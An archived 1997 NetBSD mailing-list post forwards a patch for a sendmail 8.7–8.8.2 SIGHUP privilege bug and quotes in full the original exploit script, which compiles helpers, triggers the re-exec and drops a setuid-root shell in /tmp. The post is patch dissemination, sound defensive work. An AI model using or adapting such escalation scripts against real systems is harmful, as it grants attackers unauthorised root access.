Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). (fwd)
To: netbsd-users@NetBSD.ORG, NetBSD-current Users <current-users@NetBSD.ORG>
From: Curt Sampson <cjs@portal.ca>
List: netbsd-users
Date: 04/23/1997 21:30:14
Here's a patch you'll probably want to apply ASAP.
I wonder if we don't need a netbsd-security list so that those
people who don't want patches for this sort of thing (if there are
any :-)) don't have to see this stuff.
cjs
Curt Sampson cjs@portal.ca Info at http://www.portal.ca/
Internet Portal Services, Inc.
Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.
---------- Forwarded message ----------
Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST)
From: Curt Sampson <cjs@portal.ca>
To: Leshka Zakharoff <leshka@leshka.chuvashia.su>
Cc: best-of-security@suburbia.net
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Huh. Yet another gaping hole, can you believe it? This is entirely
platform-independent, and has not yet been fixed in 8.2.2. Here's
the patch to fix it. This was done on 8.7.6; the line numbers may
differ in other versions but the patch is the same.
------------------------------------------------------
--- main.c.old Mon Sep 16 12:56:01 1996
+++ main.c Fri Nov 15 23:56:48 1996
@@ -1693,14 +1693,16 @@
sighup()
{
#ifdef LOG
if (LogLevel > 3)
syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
#endif
releasesignal(SIGHUP);
+ (void) setgid(RealGid);
+ (void) setuid(RealUid);
execv(SaveArgv[0], (ARGV_T) SaveArgv);
#ifdef LOG
if (LogLevel > 0)
syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]);
#endif
exit(EX_OSFILE);
}
------------------------------------------------------
Now who the heck to I send this to to get it back into sendmail? There
are no e-mail addresses listed for bug reports in the READ_ME file, or
anywhere else for that matter.
cjs
Curt Sampson cjs@portal.ca Info at http://www.portal.ca/
Internet Portal Services, Inc.
Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.
On Sat, 16 Nov 1996, Leshka Zakharoff wrote:
> Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
> From: Leshka Zakharoff <leshka@leshka.chuvashia.su>
> To: best-of-security@suburbia.net
> Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100
> Resent-From: best-of-security@suburbia.net
>
> #-------------------------------- CUT HERE -------------------------------------
> #/bin/sh
> #
> #
> # Hi !
> # This is exploit for sendmail smtpd bug
> # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> # This shell script does a root shell in /tmp directory.
> # If you have any problems with it, drop me a letter.
> # Have fun !
> #
> #
> # ----------------------
> # ---------------------------------------------
> # ----------------- Dedicated to my beautiful lady ------------------
> # ---------------------------------------------
> # ----------------------
> #
> # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> #
> #
> #
> echo 'main() '>>leshka.c
> echo '{ '>>leshka.c
> echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
> echo '} '>>leshka.c
> #
> #
> echo 'main() '>>smtpd.c
> echo '{ '>>smtpd.c
> echo ' setuid(0); setgid(0); '>>smtpd.c
> echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
> echo '} '>>smtpd.c
> #
> #
> cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> ./leshka
> kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> rm leshka.c leshka smtpd.c /tmp/smtpd
> /tmp/sh
> #-------------------------------- CUT HERE -------------------------------------
>
>